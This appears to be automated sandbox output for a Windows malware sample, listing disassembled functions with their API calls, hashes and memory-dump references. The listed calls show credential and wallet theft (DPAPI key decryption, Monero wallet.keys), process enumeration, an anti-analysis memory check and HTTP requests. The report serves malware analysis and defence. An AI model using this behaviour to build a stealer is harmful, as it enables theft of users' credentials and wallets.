Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2100535398-738592651
Opcode ID: a8be0c1efc6e957042e2dc58e5df4873cfaab17ae6e349d5732e4f4a9a73e687
Instruction ID: 783977262c6d180b1dc82f5080fb82b3f1d0851fcb3635cff40c44442e043e61
Opcode Fuzzy Hash: a8be0c1efc6e957042e2dc58e5df4873cfaab17ae6e349d5732e4f4a9a73e687
Instruction Fuzzy Hash: A1311EB6D10209ABCF15DFE4DC85FEFB7B8AB48304F144519E905AB241EB30AA04CBA1

Function 00358680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003605B7), ref: 003586CA
Process32First.KERNEL32(?,00000128), ref: 003586DE
Process32Next.KERNEL32(?,00000128), ref: 003586F3

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01368840,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

CloseHandle.KERNEL32(?), ref: 00358761

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: f01b5ae888f96a7cb8ed87db614c7125e9c0a1596f2751e33e2749175d2e165e
Instruction ID: 884bc5e85d8e1a08c01e7d8ef75084f831d6e7381baa8d3dce71939502e4f497
Opcode Fuzzy Hash: f01b5ae888f96a7cb8ed87db614c7125e9c0a1596f2751e33e2749175d2e165e
Instruction Fuzzy Hash: D0316D71901618ABDB26DF50DC41FEEB778FF49701F104299E90AB61A0EB306A49DFA1

Function 00356AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01368A10,?,0036110C,?,00000000,?,00361110,?,00000000,00360AEF), ref: 00356ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00356AE8
CloseHandle.KERNEL32(00000000), ref: 00356AF9
Sleep.KERNEL32(00001770), ref: 00356B04
CloseHandle.KERNEL32(?,00000000,?,01368A10,?,0036110C,?,00000000,?,00361110,?,00000000,00360AEF), ref: 00356B1A
ExitProcess.KERNEL32 ref: 00356B22

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: ab91cdc0da7125066772b957a35eda6debbdb9cd11996f96f7f3cf7c087761aa
Instruction ID: 7ca6c2cff937c667f464f8121d166fbb90cf78de86f2f577988831ca61fb0437
Opcode Fuzzy Hash: ab91cdc0da7125066772b957a35eda6debbdb9cd11996f96f7f3cf7c087761aa
Instruction Fuzzy Hash: 31F05E70944209ABF702ABA0DC0BFBD7B78EB14702F904515BD03F61E1DBB05548EB66

Function 003447B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00344839
InternetCrackUrlA.WININET(00000000,00000000), ref: 00344849

Strings

<, xrefs: 003447C9

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: 437db04ec35de0bff7668fb6b6068203a9fb116e9e0f8a5cc3706534cfe6c30d
Instruction ID: 110034f85184d9be752bdb2c4957d90973a0b959e35686f0ab232f37eaeceaf7
Opcode Fuzzy Hash: 437db04ec35de0bff7668fb6b6068203a9fb116e9e0f8a5cc3706534cfe6c30d
Instruction Fuzzy Hash: B6214DB1D00209ABDF14DFA5EC49ADE7B75FB44320F108625F925AB2D1EB706A09DF81

Function 003551F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Part of subcall function 00346280: InternetOpenA.WININET(00360DFE,00000001,00000000,00000000,00000000), ref: 003462E1
Part of subcall function 00346280: StrCmpCA.SHLWAPI(?,0136E5D0), ref: 00346303
Part of subcall function 00346280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00346335
Part of subcall function 00346280: HttpOpenRequestA.WININET(00000000,GET,?,0136D9D0,00000000,00000000,00400100,00000000), ref: 00346385
Part of subcall function 00346280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003463BF
Part of subcall function 00346280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003463D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00355228

Strings

ERROR, xrefs: 00355273
ERROR, xrefs: 0035521A

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 70e2e2e115e026cc112e5be7ae40d7f2528e2b885bc3f20561849b52b5031f70
Instruction ID: 25dc88a6e1770f70b723a7171814f03509e4affc678b48b4256841f97a937995
Opcode Fuzzy Hash: 70e2e2e115e026cc112e5be7ae40d7f2528e2b885bc3f20561849b52b5031f70
Instruction Fuzzy Hash: 82111F30900508A6CB15FF60DD52EED7778AF50301F408654FC1A5E5A2EF306B09E791

Function 00341220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0034123E
ExitProcess.KERNEL32 ref: 00341294

Strings

@, xrefs: 00341233

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 803317263-2766056989
Opcode ID: eb4062b739788f81ea8bb6a95ee7aa3cb2f2a0cdba3446504afcdd145f4a79e9
Instruction ID: 89616c3a714f514f83bb070e44c8263ae8ea1c813480a7f38f523c4c8cb58eed
Opcode Fuzzy Hash: eb4062b739788f81ea8bb6a95ee7aa3cb2f2a0cdba3446504afcdd145f4a79e9
Instruction Fuzzy Hash: 840162B0D54308BAEB10DBD4DC49B9EB7B8AB14701F208445FB05FA1C0D7B465858B59

Function 00354F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00358DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00358E0B

lstrcat.KERNEL32(?,00000000), ref: 00354F7A
lstrcat.KERNEL32(?,00361070), ref: 00354F97
lstrcat.KERNEL32(?,013689D0), ref: 00354FAB
lstrcat.KERNEL32(?,00361074), ref: 00354FBD

Part of subcall function 00354910: wsprintfA.USER32 ref: 0035492C
Part of subcall function 00354910: FindFirstFileA.KERNEL32(?,?), ref: 00354943

Part of subcall function 00354910: StrCmpCA.SHLWAPI(?,00360FDC), ref: 00354971
Part of subcall function 00354910: StrCmpCA.SHLWAPI(?,00360FE0), ref: 00354987
Part of subcall function 00354910: FindNextFileA.KERNEL32(000000FF,?), ref: 00354B7D
Part of subcall function 00354910: FindClose.KERNEL32(000000FF), ref: 00354B92

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281422401.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281440693.00000000009D4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: 3d9dcec66de9f52559030f52e302bdb643b0ea726dde6c4cd072b7b909b23afa
Instruction ID: 5491a15656770b4064f3ee6a58cc519c49a4abe77bcf677c13552b5533449186
Opcode Fuzzy Hash: 3d9dcec66de9f52559030f52e302bdb643b0ea726dde6c4cd072b7b909b23afa
Instruction Fuzzy Hash: 5121DD7690020467DB55FBB0DC46EED337CAB54300F004545BA49AA195EE7496CD9FA2

Function 00350740 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,01368820), ref: 0035079A
StrCmpCA.SHLWAPI(00000000,013688E0), ref: 00350866
StrCmpCA.SHLWAPI(00000000,01368900), ref: 0035099D

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Memory Dump Source

Source File: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.2280639457.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281049527.000000000083B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2281305355.000000000083C000.00000080.00000001.01000000.00000003.sdmpDownload File
